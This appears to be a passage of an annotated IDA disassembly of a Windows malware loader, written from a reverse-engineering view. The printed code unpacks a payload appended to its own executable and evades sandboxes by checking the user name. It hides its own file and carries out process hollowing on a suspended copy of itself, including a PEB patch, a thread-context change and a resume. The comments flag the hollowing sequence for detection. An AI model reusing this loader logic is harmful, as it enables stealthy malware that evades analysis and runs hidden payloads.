cmp dword ptr [eax+88h], 0 ; BaseReloc.VirtualAddress
jz short loc_40159F
cmp dword ptr [eax+8Ch], 0 ; BaseReloc.Size
jz short loc_40159F
xor eax, eax
inc eax ; relocatable
retn
; ---------------------------------------------------------------------------
loc_40159F: ; CODE XREF: sub_401585+Bj
; sub_401585+14j
xor eax, eax ; no relocation data
retn
sub_401585 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4015A2(int,int,DWORD flOldProtect,int,int,int,int,HANDLE hProcess,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,LPVOID lpAddress,SIZE_T dwSize)
;-----------------------------------------------------------------------
; int sub_4015A2(dos, fileHdr, optHdr, sections, image, imageSize, cmdline,
;                PROCESS_INFORMATION pi /* by value, 10h */,
;                CONTEXT ctx /* by value, 2CCh */,
;                LPVOID remoteBase, SIZE_T remoteSize)
; Prepares the suspended target created by sub_4014E8 to receive the
; local image: either makes the target's existing mapping RWX in place
; or unmaps it and allocates fresh memory (preferred base first, then
; anywhere + relocation), patches the target's PEB.ImageBaseAddress, and
; points the initial thread's Eax at the payload entry via
; SetThreadContext. WinMain then writes the image and resumes the thread.
; ABI:   cdecl (WinMain pops 300h). Frame layout from ebp:
;        +8 dos, +0Ch file hdr, +10h opt hdr (IDA's "flOldProtect"),
;        +14h sections, +18h local image, +1Ch image size, +20h cmdline,
;        +24h pi.hProcess, +28h pi.hThread, +34h ctx.ContextFlags,
;        +0D8h ctx.Ebx (PEB), +0E4h ctx.Eax, +300h remote base,
;        +304h remote region size
; Out:   eax = 1 on success, 0 if no target memory could be obtained.
;        Globals: dword_43E520 = chosen remote base, dword_43E514 =
;        hProcess, hThread = pi.hThread (consumed by WinMain/sub_401707)
; Clobb: ecx, edx, flags; ebx/esi/edi preserved
; Notes: VirtualProtectEx's lpflOldProtect points at the +10h argument
;        slot, so the optional-header pointer stored there is overwritten;
;        only the cached copy in ebx is used afterwards. In the unmap
;        branch byte 3 of that same slot serves as a success flag (set to
;        1 when ZwUnmapViewOfSection returns 0) and is compared even when
;        the call failed, relying on the pointer's top byte not being 1.
;        The results of VirtualProtectEx, GetProcAddress,
;        WriteProcessMemory and SetThreadContext are not checked.
;        dword_43E524/43E528/43E52C are indirect-call slots that IDA
;        labels WriteProcessMemory/ZwUnmapViewOfSection/SetThreadContext;
;        where they are populated is not in this listing. On failure the
;        suspended child is left suspended (no terminate/close).
;        Detection note: unmap/allocate in a suspended child, a 4-byte
;        write to its PEB+8, then SetThreadContext is the hollowing
;        sequence; it all happens within this one routine.
;-----------------------------------------------------------------------
sub_4015A2 proc near ; CODE XREF: WinMain(x,x,x,x)+13Bp
arg_0 = dword ptr 8 ; -> IMAGE_DOS_HEADER
arg_4 = dword ptr 0Ch ; -> IMAGE_FILE_HEADER
flOldProtect = dword ptr 10h ; -> IMAGE_OPTIONAL_HEADER32 on entry; reused as out-param / flag
arg_C = dword ptr 14h ; -> section table
arg_10 = dword ptr 18h ; local image buffer
arg_14 = dword ptr 1Ch ; image size
hProcess = dword ptr 24h ; pi.hProcess
arg_20 = dword ptr 28h ; pi.hThread
arg_2C = dword ptr 34h ; ctx.ContextFlags (start of the by-value CONTEXT)
arg_D0 = dword ptr 0D8h ; ctx.Ebx
arg_DC = dword ptr 0E4h ; ctx.Eax
lpAddress = dword ptr 300h ; remote image base (from sub_4014E8)
dwSize = dword ptr 304h ; remote image region size
push ebp
mov ebp, esp
mov eax, [ebp+lpAddress] ; eax = remote base
push ebx
mov ebx, [ebp+flOldProtect] ; ebx -> optional header, kept for the whole routine
cmp [ebx+1Ch], eax ; payload ImageBase == target's current base?
push esi
mov esi, ds:VirtualAllocEx
push edi
mov edi, 3000h ; MEM_COMMIT | MEM_RESERVE
jnz short loc_4015E4
mov ecx, [ebp+dwSize]
cmp [ebp+arg_14], ecx ; ...and does the image fit the existing mapping?
ja short loc_4015E4
; yes: reuse the target's mapping in place
lea edx, [ebp+flOldProtect]
push edx ; lpflOldProtect (overwrites the +10h arg slot)
push 40h ; flNewProtect = PAGE_EXECUTE_READWRITE
push ecx ; dwSize
push eax ; lpAddress
push [ebp+hProcess] ; hProcess
mov dword_43E520, eax ; remote destination = existing base
call ds:VirtualProtectEx ; VirtualProtectEx (result ignored)
jmp short loc_40161B
; ---------------------------------------------------------------------------
loc_4015E4: ; CODE XREF: sub_4015A2+1Dj
; sub_4015A2+28j
; base mismatch or too small: unmap the target image, allocate at the payload's base
mov ecx, [ebp+hProcess]
push eax
push ecx
mov dword_4082DC, ecx
mov dword_43E510, eax
call dword_43E528 ; ZwUnmapViewOfSection(hProcess, remoteBase)
test eax, eax
jnz short loc_401602
mov byte ptr [ebp+flOldProtect+3], 1 ; unmapped OK
loc_401602: ; CODE XREF: sub_4015A2+5Aj
cmp byte ptr [ebp+flOldProtect+3], 1
jnz short loc_40161B ; unmap failed: continue with dword_43E520 unset
push 40h ; flProtect = PAGE_EXECUTE_READWRITE
push edi ; flAllocationType
push [ebp+arg_14] ; dwSize
push dword ptr [ebx+1Ch] ; lpAddress = payload's preferred ImageBase
push [ebp+hProcess] ; hProcess
call esi ; VirtualAllocEx
mov dword_43E520, eax
loc_40161B: ; CODE XREF: sub_4015A2+40j
; sub_4015A2+64j
cmp dword_43E520, 0
jnz short loc_401672 ; have a destination
push ebx
call sub_401585 ; does the image carry relocations?
add esp, 4
test eax, eax
jz loc_401700 ; no: it cannot be loaded elsewhere -> fail
push 40h ; flProtect
push edi ; flAllocationType
push [ebp+arg_14] ; dwSize
push 0 ; lpAddress = let the kernel choose
push [ebp+hProcess] ; hProcess
call esi ; VirtualAllocEx
test eax, eax
mov dword_43E520, eax
jz loc_401700
push eax ; newBase
push [ebp+arg_10] ; local image
push [ebp+arg_C]
push ebx ; optional header
push [ebp+arg_4]
push [ebp+arg_0]
call sub_401479 ; rebase the local copy to newBase
add esp, 18h
cmp dword_43E520, 0
jz loc_401700
loc_401672: ; CODE XREF: sub_4015A2+80j
mov esi, [ebp+arg_D0] ; esi = ctx.Ebx (target PEB)
push offset aWriteprocessme ; "WriteProcessMemory"
push offset ModuleName ; "kernel32.dll"
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress (NULL not checked)
push 0 ; lpNumberOfBytesWritten
push 4 ; nSize
push offset dword_43E520 ; lpBuffer = &chosen base
add esi, 8 ; PEB+8 = ImageBaseAddress
push esi ; lpBaseAddress
mov esi, [ebp+hProcess]
push esi ; hProcess
call eax ; WriteProcessMemory: patch the target's PEB.ImageBaseAddress
mov eax, [ebp+arg_0]
mov eax, [eax+3Ch] ; e_lfanew
mov ecx, dword_43E520
mov edx, [ebp+arg_10]
mov [eax+edx+34h], ecx ; local image: OptionalHeader.ImageBase = chosen base
mov eax, dword_43E520
cmp eax, [ebp+lpAddress]
mov [ebp+arg_2C], 10007h ; ctx.ContextFlags = CONTEXT_FULL
jnz short loc_4016D7
mov eax, [ebx+10h] ; AddressOfEntryPoint
add eax, [ebx+1Ch] ; + ImageBase (base unchanged)
mov [ebp+arg_DC], eax ; ctx.Eax = entry point (initial-thread start address)
jmp short loc_4016E2
; ---------------------------------------------------------------------------
loc_4016D7: ; CODE XREF: sub_4015A2+125j
mov ecx, [ebx+10h] ; AddressOfEntryPoint
add ecx, eax ; + chosen base
mov [ebp+arg_DC], ecx ; ctx.Eax = entry point
loc_4016E2: ; CODE XREF: sub_4015A2+133j
mov eax, [ebp+arg_20] ; hThread
lea ecx, [ebp+arg_2C] ; &ctx (the by-value copy)
push ecx
push eax
mov dword_43E514, esi ; hProcess, for WinMain's final write
mov hThread, eax ; for sub_401707
call dword_43E52C ; SetThreadContext (result ignored)
xor eax, eax
inc eax ; return 1
jmp short loc_401702
; ---------------------------------------------------------------------------
loc_401700: ; CODE XREF: sub_4015A2+8Dj
; sub_4015A2+A7j ...
xor eax, eax ; return 0
loc_401702: ; CODE XREF: sub_4015A2+15Cj
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4015A2 endp
; =============== S U B R O U T I N E =======================================
;-----------------------------------------------------------------------
; DWORD sub_401707(void)
; Sets byte_43E518 = 1 and resumes the target thread saved in hThread by
; sub_4015A2, which starts the injected image.
; Out:   eax = ResumeThread's result (previous suspend count, or -1)
; Clobb: ecx, edx, flags
;-----------------------------------------------------------------------
sub_401707 proc near ; CODE XREF: WinMain(x,x,x,x)+168p
push hThread ; hThread
mov byte_43E518, 1
call ds:ResumeThread ; ResumeThread
retn
sub_401707 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40171B(LPCSTR lpFileName)
;-----------------------------------------------------------------------
; void *sub_40171B(LPCSTR lpFileName)
; Reads the whole file (WinMain passes the running executable's own
; path) into a malloc'd buffer, copies the bytes past dword_408040 (a
; fixed offset into the file - presumably where the appended payload
; starts; its value is not visible here) into a second buffer, and
; inflates them with sub_401000.
; ABI:   cdecl (WinMain pops 4)
; Out:   eax = decompressed payload (also stored in dword_4082C4), or
;        NULL if sub_401000 failed. Side effects: hFile and
;        nNumberOfBytesToRead are set; dword_408040 is reset to 0 so the
;        later parsers index the decompressed buffer from its start.
; Clobb: ecx, edx, flags; ebx/esi/edi preserved
; Notes: CreateFileA, GetFileSize, malloc and ReadFile results are not
;        checked; hFile is never closed and neither intermediate buffer
;        is freed. The copy loop writes a 0 after every byte, so the
;        second buffer ends NUL-terminated.
;-----------------------------------------------------------------------
sub_40171B proc near ; CODE XREF: WinMain(x,x,x,x)+28p
NumberOfBytesRead= dword ptr -4
lpFileName = dword ptr 8
push ebp
mov ebp, esp
push ecx ; reserve NumberOfBytesRead
push ebx
push esi
push edi
xor ebx, ebx ; ebx = 0 for the rest of the routine
push ebx ; hTemplateFile
push 80h ; dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL
push 3 ; dwCreationDisposition = OPEN_EXISTING
push ebx ; lpSecurityAttributes
push 1 ; dwShareMode = FILE_SHARE_READ
push 80000000h ; dwDesiredAccess = GENERIC_READ
push [ebp+lpFileName] ; lpFileName
call ds:CreateFileA ; CreateFileA (INVALID_HANDLE_VALUE not checked)
push ebx ; lpFileSizeHigh
push eax ; hFile
mov hFile, eax
call ds:GetFileSize ; GetFileSize
mov nNumberOfBytesToRead, eax
inc eax
push eax ; Size = file size + 1
call _malloc
pop ecx
push ebx ; lpOverlapped
lea ecx, [ebp+NumberOfBytesRead]
push ecx ; lpNumberOfBytesRead
push nNumberOfBytesToRead ; nNumberOfBytesToRead
mov dword_4082C4, eax ; file buffer
push eax ; lpBuffer
push hFile ; hFile
call ds:ReadFile ; ReadFile (result ignored)
mov eax, [ebp+NumberOfBytesRead]
sub eax, dword_408040
inc eax
push eax ; Size = bytes after the offset + 1
call _malloc
mov esi, [ebp+NumberOfBytesRead]
pop ecx
mov ecx, dword_408040
mov edi, esi
xor edx, edx ; edx = index
sub edi, ecx ; edi = bytes read - offset
jz short loc_4017BA ; nothing after the offset
loc_401796: ; CODE XREF: sub_40171B+9Dj
; out[edx] = file[offset + edx]; out[edx+1] = 0 (globals reloaded each pass)
mov esi, dword_4082C4
add ecx, esi
mov cl, [ecx+edx]
mov [eax+edx], cl
mov [eax+edx+1], bl
mov esi, [ebp+NumberOfBytesRead]
mov ecx, dword_408040
mov edi, esi
inc edx
sub edi, ecx
cmp edx, edi
jb short loc_401796
loc_4017BA: ; CODE XREF: sub_40171B+79j
; esi = bytes read, ecx = offset, eax = copied payload
lea edx, [ebp+NumberOfBytesRead]
push edx ; receives FinalUncompressedSize (not used afterwards)
sub esi, ecx
push esi ; compressed size
push eax ; compressed data
call sub_401000 ; inflate
add esp, 0Ch
pop edi
pop esi
mov dword_408040, ebx ; offset = 0: the decompressed buffer starts at the payload
mov dword_4082C4, eax ; payload buffer = decompressed image
pop ebx
leave
retn
sub_40171B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
;-----------------------------------------------------------------------
; BOOL sub_4017DA(void)
; Fetches the current user name (GetUserNameA into a 64h-byte buffer) and
; returns 1 when it equals "USER" or "CurrentUser" exactly (lstrcmpA is
; case-sensitive), 0 otherwise or when GetUserNameA fails.
; WinMain treats 1 as "do not run": it shows a message box and exits.
; Both names are typical of analysis sandboxes, so this reads as an
; anti-analysis gate; that intent is inferred, not stated by the code.
; Clobb: eax, ecx, edx, flags; esi preserved
;-----------------------------------------------------------------------
sub_4017DA proc near ; CODE XREF: WinMain(x,x,x,x)+2Ep
String2 = byte ptr -68h
pcbBuffer = dword ptr -4
push ebp
mov ebp, esp
sub esp, 68h
push esi
push 64h
pop esi ; esi = 64h = buffer size
push esi ; Size
lea eax, [ebp+String2]
push 0 ; Val
push eax ; Dst
call _memset ; zero the name buffer
add esp, 0Ch
lea eax, [ebp+pcbBuffer]
push eax ; pcbBuffer
lea eax, [ebp+String2]
push eax ; lpBuffer
mov [ebp+pcbBuffer], esi
call ds:GetUserNameA ; GetUserNameA
test eax, eax
jz short loc_401830 ; lookup failed -> 0
mov esi, ds:lstrcmpA
lea eax, [ebp+String2]
push eax ; lpString2
push offset String1 ; "USER"
call esi ; lstrcmpA
test eax, eax
jz short loc_40182C ; name == "USER"
lea eax, [ebp+String2]
push eax ; lpString2
push offset aCurrentuser ; "CurrentUser"
call esi ; lstrcmpA
test eax, eax
jnz short loc_401830 ; neither name -> 0
loc_40182C: ; CODE XREF: sub_4017DA+41j
mov al, 1
jmp short loc_401832
; ---------------------------------------------------------------------------
loc_401830: ; CODE XREF: sub_4017DA+2Cj
; sub_4017DA+50j
xor al, al
loc_401832: ; CODE XREF: sub_4017DA+54j
pop esi
leave
retn
sub_4017DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
;-----------------------------------------------------------------------
; int __stdcall WinMain(HINSTANCE, HINSTANCE, LPSTR, int)
; Driver for the loader: reads and inflates the payload appended to this
; executable (sub_40171B), bails out under known analysis user names
; (sub_4017DA), hides its own file (HIDDEN|SYSTEM), parses the payload
; headers (sub_4010AD), builds the payload as a memory image
; (sub_401313), starts a suspended copy of itself (sub_4014E8), hollows
; that process with the image (sub_4015A2 + WriteProcessMemory) and
; resumes it (sub_401707).
; Out:   eax = 0 always
; Notes: VirtualAlloc and WriteProcessMemory are resolved at run time
;        (GetProcAddress / the indirect slot dword_43E524) rather than
;        imported. The results of VirtualAlloc, sub_4014E8 and
;        sub_4015A2 are not checked, so the final WriteProcessMemory
;        runs with whatever dword_43E514/dword_43E520 hold even if
;        process creation failed. The by-value copies of CONTEXT (2CCh)
;        and PROCESS_INFORMATION (10h) for sub_4015A2 are assembled with
;        rep movsd / movsd on the stack below the pushed arguments; all
;        300h bytes are popped after the call.
;-----------------------------------------------------------------------
_WinMain@16 proc near ; CODE XREF: start+186p
Context = CONTEXT ptr -524h
flOldProtect = dword ptr -258h ; IMAGE_OPTIONAL_HEADER32 (0E0h bytes), misnamed by IDA
FileName = byte ptr -178h ; 100h bytes
var_78 = dword ptr -78h ; IMAGE_DOS_HEADER (40h bytes)
ProcessInformation= _PROCESS_INFORMATION ptr -38h
var_28 = dword ptr -28h ; PE signature + IMAGE_FILE_HEADER (18h bytes)
Buffer = dword ptr -10h ; remote image base (from sub_4014E8)
dwSize = dword ptr -0Ch ; remote image region size (from sub_4014E8)
var_8 = dword ptr -8 ; local image buffer
var_4 = dword ptr -4 ; section table (new'd by sub_4010AD)
hInstance = dword ptr 8
hPrevInstance = dword ptr 0Ch
lpCmdLine = dword ptr 10h
nShowCmd = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 524h
push ebx
push esi
push edi
push 100h ; nSize
lea eax, [ebp+FileName]
push eax ; lpFilename
xor esi, esi ; esi = 0 for the rest of the routine
push esi ; hModule = NULL -> this executable
call ds:GetModuleFileNameA ; GetModuleFileNameA
lea eax, [ebp+FileName]
push eax ; lpFileName
call sub_40171B ; read + inflate the appended payload
pop ecx
call sub_4017DA ; user-name gate
test al, al
jz short loc_401883
push esi ; uType
push offset Caption ; ".%%%^###########%^#^"
push offset Text ; "."
push esi ; hWnd
call ds:MessageBoxA ; MessageBoxA
jmp loc_4019A2 ; show the box and exit without running the payload
; ---------------------------------------------------------------------------
loc_401883: ; CODE XREF: WinMain(x,x,x,x)+35j
push 6 ; dwFileAttributes = FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:SetFileAttributesA ; SetFileAttributesA
lea eax, [ebp+var_4]
push eax ; &section table
lea eax, [ebp+flOldProtect]
push eax ; optional header out
lea eax, [ebp+var_28]
push eax ; file header out
lea eax, [ebp+var_78]
push eax ; DOS header out
call sub_4010AD ; decode the payload's headers
add esp, 10h
test al, al
jz loc_4019A2 ; not a usable PE32: exit
push [ebp+var_4]
lea eax, [ebp+flOldProtect]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_78]
push eax
call sub_40129D ; aligned image size
add esp, 10h
push offset aVirtualalloc ; "VirtualAlloc"
push offset ModuleName ; "kernel32.dll"
mov ebx, eax ; ebx = image size
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
push 40h ; flProtect = PAGE_EXECUTE_READWRITE
push 1000h ; flAllocationType = MEM_COMMIT
push ebx ; dwSize
push esi ; lpAddress = NULL
call eax ; VirtualAlloc (NULL not checked)
push eax ; Dst
push [ebp+var_4] ; int
mov [ebp+var_8], eax ; var_8 = local image buffer
lea eax, [ebp+flOldProtect]
push eax ; Size
lea eax, [ebp+var_28]
push eax ; int
lea eax, [ebp+var_78]
push eax ; int
call sub_401313 ; build the image in var_8 (args popped below)
lea eax, [ebp+Buffer]
push eax ; lpBuffer
lea eax, [ebp+Context]
push eax ; lpContext
lea eax, [ebp+ProcessInformation]
push eax ; lpProcessInformation
lea eax, [ebp+FileName]
push eax ; lpCommandLine = this executable
call sub_4014E8 ; suspended child of itself (result ignored)
add esp, 24h ; sub_401313(14h) + sub_4014E8(10h)
push [ebp+dwSize] ; dwSize
mov ecx, 0B3h ; 0B3h dwords = 2CCh = sizeof(CONTEXT)
push [ebp+Buffer] ; lpAddress
lea esi, [ebp+Context]
sub esp, 2CCh ; room for the by-value CONTEXT
mov edi, esp
sub esp, 10h ; room for the by-value PROCESS_INFORMATION
rep movsd ; copy CONTEXT
mov edi, esp
lea eax, [ebp+FileName]
push eax ; int
push ebx ; int
push [ebp+var_8] ; int
lea esi, [ebp+ProcessInformation]
push [ebp+var_4] ; int
movsd ; pi.hProcess (the four movsd are interleaved with the pushes)
movsd ; pi.hThread
lea eax, [ebp+flOldProtect]
push eax ; flOldProtect
lea eax, [ebp+var_28]
movsd ; pi.dwProcessId
push eax ; int
lea eax, [ebp+var_78]
push eax ; int
movsd ; pi.dwThreadId
call sub_4015A2 ; prepare target memory + thread context (result ignored)
add esp, 300h
push 0 ; lpNumberOfBytesWritten
push ebx ; nSize = image size
push [ebp+var_8] ; lpBuffer = local image
push dword_43E520 ; lpBaseAddress = remote base chosen by sub_4015A2
push dword_43E514 ; hProcess
call dword_43E524 ; WriteProcessMemory: copy the whole image into the target
test eax, eax
setnz al
mov byte_43E518, al ; remember whether the write succeeded (not acted on)
call sub_401707 ; resume the target thread
loc_4019A2: ; CODE XREF: WinMain(x,x,x,x)+49j
; WinMain(x,x,x,x)+7Aj
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
_WinMain@16 endp
; [00000046 BYTES: COLLAPSED FUNCTION __heap_alloc. PRESS KEYPAD "+" TO EXPAND]
; [0000002C BYTES: COLLAPSED FUNCTION __nh_malloc. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _malloc. PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION operator new(uint). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000033D BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000060 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __amsg_exit. PRESS KEYPAD "+" TO EXPAND]
; Three instructions IDA did not fold into the collapsed __amsg_exit
; above: pop ecx / pop ecx / retn. Presumably that function's epilogue,
; unreachable after a no-return call, rather than separately called code.
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
;-----------------------------------------------------------------------
; _fast_error_exit(int rterrnum)   [MSVC CRT]
; Reports a run-time error and exits: prints the banner when
; dword_43E538 == 1 (looks like the CRT's error-mode/app-type flag; not
; confirmed here), writes the message for the code at [esp+4], then
; calls unknown_libname_1 with 0FFh as the exit status. The three bytes
; after that call decode to pop ecx / pop ecx / retn - an epilogue IDA
; left as data because the call does not return.
;-----------------------------------------------------------------------
_fast_error_exit:
cmp dword_43E538, 1
jnz short loc_401E13
call __FF_MSGBANNER
loc_401E13: ; CODE XREF: .text:00401E0Cj
push dword ptr [esp+4] ; rterrnum
call __NMSG_WRITE
push 0FFh ; exit status 255
call unknown_libname_1 ; Microsoft VisualC 2-8/net runtime
; ---------------------------------------------------------------------------
db 59h ; 59h = pop ecx
db 59h ; 59h = pop ecx
db 0C3h ; 0C3h = retn
; ---------------------------------------------------------------------------
;-----------------------------------------------------------------------
; int _check_managed_app(void)   [MSVC CRT]
; Returns 1 if the running module has a COM/CLR descriptor directory
; (data directory index 14), i.e. is a managed app, else 0. Walks its
; own headers: 'MZ', 'PE\0\0', then the optional-header magic selects
; the PE32 (10Bh) or PE32+ (20Bh) field layout.
; Clobb: eax, ecx, flags
;-----------------------------------------------------------------------
_check_managed_app:
push 0
call ds:GetModuleHandleA ; GetModuleHandleA -> own image base
cmp word ptr [eax], 5A4Dh ; e_magic 'MZ'
jnz short loc_401E57
mov ecx, [eax+3Ch]
add ecx, eax ; ecx -> IMAGE_NT_HEADERS
cmp dword ptr [ecx], 4550h ; Signature 'PE\0\0'
jnz short loc_401E57
movzx eax, word ptr [ecx+18h] ; OptionalHeader.Magic
cmp eax, 10Bh ; PE32
jz short loc_401E6D
cmp eax, 20Bh ; PE32+
jz short loc_401E5A
loc_401E57: ; CODE XREF: .text:00401E36j
; .text:00401E43j
xor eax, eax ; not a recognised PE -> 0
retn
; ---------------------------------------------------------------------------
loc_401E5A: ; CODE XREF: .text:00401E55j
; PE32+: NumberOfRvaAndSizes at +84h, DataDirectory[14] at +0F8h
xor eax, eax
cmp dword ptr [ecx+84h], 0Eh
jbe short locret_401E7E ; directory 14 not present -> 0
cmp [ecx+0F8h], eax
jmp short loc_401E7B
; ---------------------------------------------------------------------------
loc_401E6D: ; CODE XREF: .text:00401E4Ej
; PE32: NumberOfRvaAndSizes at +74h, DataDirectory[14] at +0E8h
xor eax, eax
cmp dword ptr [ecx+74h], 0Eh
jbe short locret_401E7E ; directory 14 not present -> 0
cmp [ecx+0E8h], eax
loc_401E7B: ; CODE XREF: .text:00401E6Bj
setnz al ; 1 if the COM descriptor VirtualAddress != 0
locret_401E7E: ; CODE XREF: .text:00401E63j
; .text:00401E73j
retn
; [000001DC BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; [0000001A BYTES: COLLAPSED FUNCTION ___heap_select. PRESS KEYPAD "+" TO EXPAND]
; [00000051 BYTES: COLLAPSED FUNCTION __heap_init. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
;-----------------------------------------------------------------------
; void __heap_term(void)   [MSVC CRT]
; Tears down the CRT heap. When dword_43EAD8 == 3 (the small-block-heap
; mode selector, judging by its use here; not confirmed) it walks the
; region table at lpMem (dword_43EABC entries of 14h bytes; the pointer
; at +0Ch is the region's reserved address, the one at +10h a heap
; block), decommits and releases each region's 100000h-byte reservation,
; frees the heap block, then frees the table itself. Finally destroys
; hHeap. The two-instruction routine after the retn just returns hHeap
; (the CRT's heap-handle getter, presumably).
;-----------------------------------------------------------------------
__heap_term:
cmp dword_43EAD8, 3
jnz short loc_402138
push ebx
xor ebx, ebx ; ebx = region index
cmp dword_43EABC, ebx ; region count
push ebp
mov ebp, ds:HeapFree
jle short loc_402126
push esi
mov esi, lpMem
push edi
mov edi, ds:VirtualFree
add esi, 0Ch ; esi -> region[0] address field
loc_4020F2: ; CODE XREF: .text:00402122j
push 4000h ; MEM_DECOMMIT
push 100000h ; dwSize = 1 MB
push dword ptr [esi]
call edi ; VirtualFree
push 8000h ; MEM_RELEASE
push 0
push dword ptr [esi]
call edi ; VirtualFree
push dword ptr [esi+4] ; region's heap block
push 0
push hHeap
call ebp ; HeapFree
add esi, 14h ; next region entry
inc ebx
cmp ebx, dword_43EABC
jl short loc_4020F2
pop edi
pop esi
loc_402126: ; CODE XREF: .text:004020DFj
push lpMem ; the region table itself
push 0
push hHeap
call ebp ; HeapFree
pop ebp
pop ebx
loc_402138: ; CODE XREF: .text:004020CDj
push hHeap
call ds:HeapDestroy ; HeapDestroy
retn
; ---------------------------------------------------------------------------
mov eax, hHeap ; separate entry: return the CRT heap handle
retn
; [00000015 BYTES: COLLAPSED FUNCTION __get_sbh_threshold. PRESS KEYPAD "+" TO EXPAND]
; [00000048 BYTES: COLLAPSED FUNCTION ___sbh_heap_init. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND]
; [00000318 BYTES: COLLAPSED FUNCTION ___sbh_free_block. PRESS KEYPAD "+" TO EXPAND]
; [000000B7 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+" TO EXPAND]
; [00000106 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND]
; [000002DF BYTES: COLLAPSED FUNCTION ___sbh_resize_block. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
;-----------------------------------------------------------------------
; void __sbh_heapmin(void)   [MSVC CRT small-block heap]
; Releases the cached empty group recorded in dword_43EAB8 (region) and
; dword_43EAD0 (group index): decommits its 8000h-byte span, sets the
; group's bit in the region's bit vector at +8, zeroes the group's slot
; in the per-region table at +10h, and when that region has no committed
; groups left and more than one region exists, frees the region's table
; and compacts the region list with memcpy. Field meanings below are
; read off the offsets used here, not confirmed against CRT source.
;-----------------------------------------------------------------------
___sbh_heapmin:
mov eax, dword_43EAB8 ; eax -> region holding a cached empty group
test eax, eax
jz locret_402A57 ; nothing cached
mov ecx, dword_43EAD0 ; group index
push 4000h ; MEM_DECOMMIT
shl ecx, 0Fh ; index * 8000h
add ecx, [eax+0Ch] ; + region base -> group address
push 8000h ; dwSize
push ecx ; lpAddress
call ds:VirtualFree ; VirtualFree
mov ecx, dword_43EAD0
mov eax, dword_43EAB8
mov edx, 80000000h
shr edx, cl
or [eax+8], edx ; set bit (31 - index) in the region's bit vector
mov eax, dword_43EAB8
mov eax, [eax+10h]
mov ecx, dword_43EAD0
and dword ptr [eax+ecx*4+0C4h], 0 ; table slot for this group = 0
mov eax, dword_43EAB8
mov eax, [eax+10h]
dec byte ptr [eax+43h] ; one fewer committed group
mov eax, dword_43EAB8
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_4029FE
and dword ptr [eax+4], 0FFFFFFFEh ; none committed: clear flag bit 0
mov eax, dword_43EAB8
loc_4029FE: ; CODE XREF: .text:004029F3j
cmp dword ptr [eax+8], 0FFFFFFFFh ; every group bit set?
jnz short loc_402A50
cmp dword_43EABC, 1 ; more than one region?
jle short loc_402A50
push dword ptr [eax+10h]
push 0
push hHeap
call ds:HeapFree ; free the region's table
mov eax, dword_43EABC
mov edx, lpMem
lea eax, [eax+eax*4]
shl eax, 2 ; eax = count * 14h = size of the region list
mov ecx, eax
mov eax, dword_43EAB8
sub ecx, eax
lea ecx, [ecx+edx-14h] ; bytes after this entry = list_end - (entry + 14h)
push ecx ; Size
lea ecx, [eax+14h]
push ecx ; Src = next entry
push eax ; Dst = this entry
call _memcpy_0 ; shift the later entries down over this one
add esp, 0Ch
dec dword_43EABC
loc_402A50: ; CODE XREF: .text:00402A02j
; .text:00402A0Bj
and dword_43EAB8, 0 ; clear the cache
locret_402A57: ; CODE XREF: .text:0040298Ej
retn
; [00000319 BYTES: COLLAPSED FUNCTION ___sbh_heap_check. PRESS KEYPAD "+" TO EXPAND]
; [0000005B BYTES: COLLAPSED FUNCTION __set_sbh_threshold. PRESS KEYPAD "+" TO EXPAND]
; [000002FC BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; Accessor pair for the CRT global dword_43E53C (unnamed by IDA; the
; neighbouring __callnewh suggests the new-handler slot, not confirmed).
; First routine: store [esp+4], return the previous value.
; Second routine: return the current value.
mov ecx, [esp+4]
mov eax, dword_43E53C ; eax = old value
mov dword_43E53C, ecx
retn
